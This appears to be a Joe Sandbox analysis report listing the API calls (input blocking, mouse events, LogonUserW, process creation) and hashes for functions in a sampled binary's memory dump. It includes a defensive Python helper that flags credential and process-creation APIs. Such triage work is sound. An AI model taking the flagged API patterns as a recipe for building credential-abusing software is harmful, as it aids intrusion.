• Opcode ID: 2743877c72d54a088e06d655263e70225a0562f9ca6096d02e4dd17ad5dd7739
• Instruction ID: 122f8f4037ab2f27e9d4eb50403de529215778ea8d0992c7b6a228c16500e155
• Opcode Fuzzy Hash: 2743877c72d54a088e06d655263e70225a0562f9ca6096d02e4dd17ad5dd7739
• Instruction Fuzzy Hash: 31B1DF21D2AF414DD223963A8831336B69CBFBB2D5F91D71BFC2A74D62EB6185C74180
APIs
• __time64.LIBCMT ref: 00E2B6DF
  • Part of subcall function 00E0344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E2BDC3,00000000,?,?,?,?,00E2BF70,00000000,?), ref: 00E03453
  • Part of subcall function 00E0344A: __aulldiv.LIBCMT ref: 00E03473
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID:
• API String ID: 2893107130-0
• Opcode ID: e03362fe768bef049aa4a5a9f1bf8ee5d0579bcafd3e0697480d01400f1e3c79
• Instruction ID: 28f44fc3ac661b107f267a3e10d086a92a53f887f319cdc81c41f305fec17ddc
• Opcode Fuzzy Hash: e03362fe768bef049aa4a5a9f1bf8ee5d0579bcafd3e0697480d01400f1e3c79
• Instruction Fuzzy Hash: C6219072634510CBCB29CF39D481A52B7E1EB99310B248E6DE0E5DB2C1CB74B909CB54
APIs
  • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
• NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00E504F4
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: ac70f70ab71a71daac7c92d8b6c1128f532896845dad0664acf17f5850810e4a
• Instruction ID: 2c2461abb6ac46015846d5d30dce5d5e8450053cec1c30ed79f9938220d83359
• Opcode Fuzzy Hash: ac70f70ab71a71daac7c92d8b6c1128f532896845dad0664acf17f5850810e4a
• Instruction Fuzzy Hash: 4B110631204225BAFB244A28DD06FBD3654DB85B25F249B15FF32BA5E2CAA45D0492A4
APIs
  • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
• NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00E5E467,?,?,?,?,00000000,?), ref: 00E50127
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
• Opcode ID: 6bbdf7847b5ae1d5b291e23219654d737aea743f78b618e1faeda768c20119a4
                                                                                                                  • Instruction ID: 7e3fcb24701a7590c9bf3408d3e00ee5fefaf27e354c58928c6ac4b7a98b2825
                                                                                                                  • Opcode Fuzzy Hash: 6bbdf7847b5ae1d5b291e23219654d737aea743f78b618e1faeda768c20119a4
                                                                                                                  • Instruction Fuzzy Hash: 1C012831A00114AFDF148F25DD0ABFA3B92EF8536AF045555FD557B192C331AC14D761
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00E4E9F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CallLongProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4084987330-0
                                                                                                                  • Opcode ID: 146040b9492007d10088af586af41067b4c06ba80ac1613279c592a1710a7615
                                                                                                                  • Instruction ID: 00291a8e585d8f427f4792c8b0d5404230fe88fc66ce036067cf60d106adec2d
                                                                                                                  • Opcode Fuzzy Hash: 146040b9492007d10088af586af41067b4c06ba80ac1613279c592a1710a7615
                                                                                                                  • Instruction Fuzzy Hash: 0CF03C31204108EFCB159F55FC00CB93BA6FB49360B049555FE15AB6A1C772A860EB61
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                    • Part of subcall function 00DFB63C: GetCursorPos.USER32(000000FF), ref: 00DFB64F
                                                                                                                    • Part of subcall function 00DFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00DFB66C
                                                                                                                    • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000001), ref: 00DFB691
                                                                                                                    • Part of subcall function 00DFB63C: GetAsyncKeyState.USER32(00000002), ref: 00DFB69F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00E5E514,?,?,?,?,?,00000001,?), ref: 00E4ECCA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2356834413-0
                                                                                                                  • Opcode ID: 74e8c050fa805d2fe5049ed82c991708155c554ed47d51159307606200fb33df
                                                                                                                  • Instruction ID: 52c4d8f4bc04b368ef974a8aba02f8d960b1a50bcbf16f3a593e7da851ea7431
                                                                                                                  • Opcode Fuzzy Hash: 74e8c050fa805d2fe5049ed82c991708155c554ed47d51159307606200fb33df
                                                                                                                  • Instruction Fuzzy Hash: B9F0A730200228EFDF145F05DC06EBE3B55EB45750F084055F9066A291C771A9A0DBE0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?), ref: 00DFAB45
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: 0f3a8cb58e5f211a5eb4963c8c77eadf50e965e14b49df081ea9676fe7476175
                                                                                                                  • Instruction ID: f113cb30c2f8577caee416a8a2457aa16b5c824a5af8d684748435d129f40bb9
                                                                                                                  • Opcode Fuzzy Hash: 0f3a8cb58e5f211a5eb4963c8c77eadf50e965e14b49df081ea9676fe7476175
                                                                                                                  • Instruction Fuzzy Hash: 0DF0E234600219DFDB188F09DC11A393BA2FB89361F048259FD129B2B0D771E950DB60
                                                                                                                  APIs
                                                                                                                  • BlockInput.USER32(00000001), ref: 00E36ACA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BlockInput
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3456056419-0
                                                                                                                  • Opcode ID: 8b32928ab5420180dd1e02e56e4a3b3fa6828dd9e890935cf230076ff8273dfd
                                                                                                                  • Instruction ID: 1c2219847a6070619fe9e3a1849945a438f7db974a33b2e3ef6c60c90f8be35d
                                                                                                                  • Opcode Fuzzy Hash: 8b32928ab5420180dd1e02e56e4a3b3fa6828dd9e890935cf230076ff8273dfd
                                                                                                                  • Instruction Fuzzy Hash: A7E012352002046FC700EB69D80499ABBEDEF68751F05C416EA45E7291DAB0E8048BA0
                                                                                                                  APIs
                                                                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E2750A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: mouse_event
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2434400541-0
                                                                                                                  • Opcode ID: c2913811aaa9b56aaf277722fd12682f596aded725af15aff83f2f9f99f4cbf3
                                                                                                                  • Instruction ID: e96874eb1acc73350861a945c831f365faa18bf82504c2101a214fad25c984b1
                                                                                                                  • Opcode Fuzzy Hash: c2913811aaa9b56aaf277722fd12682f596aded725af15aff83f2f9f99f4cbf3
                                                                                                                  • Instruction Fuzzy Hash: EED09EA41AC62579EC191724BC1BFB75508F304795FD46549B693F90C0A8D45D05E031
                                                                                                                  APIs
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00E4F649
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3239928679-0
                                                                                                                  • Opcode ID: 16e8c0bc3f39a0dac29dd466acc7389f71d7ead05be735811ff0dd80e31bd0b2
                                                                                                                  • Instruction ID: 7fc8f10505d4bd2d8efe220e7c5261aa940a4e852c435a715cd897d72716b906
                                                                                                                  • Opcode Fuzzy Hash: 16e8c0bc3f39a0dac29dd466acc7389f71d7ead05be735811ff0dd80e31bd0b2
                                                                                                                  • Instruction Fuzzy Hash: AEF03931605294AFDB219E58EC15FC67B99AB5A720F084085BA11672E1CA707820DBA0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00DFB35F
                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00DFAB7D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2065330234-0
                                                                                                                  • Opcode ID: ddb522e41d92c4041e3100c8f40caf60dc85ace5ebb98e0f204734481031c9c7
                                                                                                                  • Instruction ID: 20e79fb0f539d7b8d3978697670d7c1afffd345db1dfcecb6835ca489fb0da0d
                                                                                                                  • Opcode Fuzzy Hash: ddb522e41d92c4041e3100c8f40caf60dc85ace5ebb98e0f204734481031c9c7
                                                                                                                  • Instruction Fuzzy Hash: 42E01235644208FFCF15AF91DC12E693F2AEB8D364F148099F6059F2A1CB73A522DB60
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E1AD3E), ref: 00E1B124
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 528220b9ee93b1492a6d002afe82096eb384b8ce86d8f35d0dfc03402f6d079e
• Instruction ID: 5911990309201c4c5ba5d6dad44642049349db4ea56be3c8d4650d5fc315f7a5
• Opcode Fuzzy Hash: 528220b9ee93b1492a6d002afe82096eb384b8ce86d8f35d0dfc03402f6d079e
• Instruction Fuzzy Hash: CAD05E321A864EAEDF024FA4EC02EAF3F6AEB04700F408110FA11D50A0C671D531AB50

APIs
• NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00E5E4D1,?,?,?,?,?,?), ref: 00E4F67F
  • Part of subcall function 00E4E32E: _memset.LIBCMT ref: 00E4E33D
  • Part of subcall function 00E4E32E: _memset.LIBCMT ref: 00E4E34C
  • Part of subcall function 00E4E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EA3D00,00EA3D44), ref: 00E4E37B
  • Part of subcall function 00E4E32E: CloseHandle.KERNEL32 ref: 00E4E38D
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
• String ID:
• API String ID: 2364484715-0
• Opcode ID: 736a7ef94f490f3a5801daedf674d023dc4c3e89be6a7daff65588a16d6831e0
• Instruction ID: 754158c522b6a8e05bf3c6b811547f80edaee549afb0063eeffeb9dba91242de
• Opcode Fuzzy Hash: 736a7ef94f490f3a5801daedf674d023dc4c3e89be6a7daff65588a16d6831e0
• Instruction Fuzzy Hash: EAE04631200208DFCB02DF05EC05E8637A6FB0C714F024094FA01672B1C731AC60EF80

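The two entries above are the ones in this stretch of the listing worth a second look: the function at 00E1B124 calls LogonUserW directly, and the function at 00E4F67F reaches CreateProcessW only through subcall 00E4E32E, so a scan that looks at direct calls alone would miss it. A full report runs to thousands of these entries, and it is quicker to parse them than to read them. The Python helper below is an added example written for this page, not Joe Sandbox code or output: it parses the plain-text entry layout visible here (bullet lines under the labels APIs, Memory Dump Source, Joe Sandbox IDA Plugin and Similarity), strips the "Download File" link residue from the Associated lines, and flags functions whose direct or subcall APIs fall in a watch-list. The watch-list is an assumption chosen for illustration, and the sample input is two entries excerpted from this report with their Associated lines trimmed and some Similarity fields dropped.

```python
"""Triage helper for Joe Sandbox function entries (added example, not Joe Sandbox code).

Parses the plain-text entry layout seen on this page and flags functions that
reach credential or process-creation APIs, counting APIs reached through
'Part of subcall function' lines as well as direct calls.
"""
import re
from dataclasses import dataclass, field

# Direct call:  "• LogonUserW.ADVAPI32(?,00000001,...), ref: 00E1B124"
# Subcall:      "• Part of subcall function 00E4E32E: CloseHandle.KERNEL32 ref: 00E4E38D"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\(.*?\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
LINK_RESIDUE = "Download File"   # page-extraction residue glued onto 'Associated' lines

# Assumed watch-list for this example: credential use plus process creation in
# one binary is the run-as style pattern worth checking first.
SENSITIVE = {"LogonUserW", "LogonUserA", "CreateProcessW", "CreateProcessA",
             "CreateProcessAsUserW", "CreateProcessWithLogonW"}


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)        # (api, module, ref, subcall or None)
    associated: list = field(default_factory=list)  # associated memory dumps
    fields: dict = field(default_factory=dict)      # Opcode ID, Instruction Fuzzy Hash, ...

    def api_names(self):
        return {api for api, _module, _ref, _sub in self.apis}

    def first_ref(self):
        # Address of the first direct (non-subcall) call identifies the function.
        for _api, _module, ref, sub in self.apis:
            if sub is None and ref:
                return ref
        return None


def parse_entries(text):
    """Split report text into FunctionEntry records.

    'Instruction Fuzzy Hash' is the last line of every entry in this layout and
    terminates a record; an entry need not begin with an 'APIs' label, since
    some functions list no APIs. A trailing partial record is kept.
    """
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith(LINK_RESIDUE):
            line = line[: -len(LINK_RESIDUE)].strip()
        if not line:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["api"], m["module"], m["ref"], m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue                      # section labels such as 'APIs' or 'Similarity'
        key, val = f["key"].strip(), f["val"].strip()
        if key == "Associated":
            cur.associated.append(val)
            continue
        cur.fields[key] = val
        if key == "Instruction Fuzzy Hash":
            entries.append(cur)
            cur = FunctionEntry()
    if cur.apis or cur.fields:
        entries.append(cur)
    return entries


def flag_sensitive(entries, watch=SENSITIVE):
    """Return [(first_ref, sorted watched APIs)] for every entry touching the watch-list."""
    hits = []
    for e in entries:
        found = sorted(e.api_names() & watch)
        if found:
            hits.append((e.first_ref(), found))
    return hits


# Two entries excerpted from this report (Associated lines trimmed to one, some
# Similarity fields dropped; one 'Download File' residue left in to show the strip).
SAMPLE = """\
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E1AD3E), ref: 00E1B124
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 528220b9ee93b1492a6d002afe82096eb384b8ce86d8f35d0dfc03402f6d079e
• Instruction Fuzzy Hash: CAD05E321A864EAEDF024FA4EC02EAF3F6AEB04700F408110FA11D50A0C671D531AB50
APIs
• NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00E5E4D1,?,?,?,?,?,?), ref: 00E4F67F
  • Part of subcall function 00E4E32E: _memset.LIBCMT ref: 00E4E33D
  • Part of subcall function 00E4E32E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EA3D00,00EA3D44), ref: 00E4E37B
  • Part of subcall function 00E4E32E: CloseHandle.KERNEL32 ref: 00E4E38D
Similarity
• API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
• API String ID: 2364484715-0
• Opcode ID: 736a7ef94f490f3a5801daedf674d023dc4c3e89be6a7daff65588a16d6831e0
• Instruction Fuzzy Hash: EAE04631200208DFCB02DF05EC05E8637A6FB0C714F024094FA01672B1C731AC60EF80
"""

if __name__ == "__main__":
    for ref, apis in flag_sensitive(parse_entries(SAMPLE)):
        print(f"function at {ref}: {', '.join(apis)}")
```

Run against the whole saved report text instead of SAMPLE, the same two calls give a list of function addresses to open in the disassembler first; the Opcode ID and Instruction Fuzzy Hash fields stay available in `fields` for matching the same functions across other reports.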
APIs
• NtdllDialogWndProc_W.NTDLL ref: 00E4F5FF
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
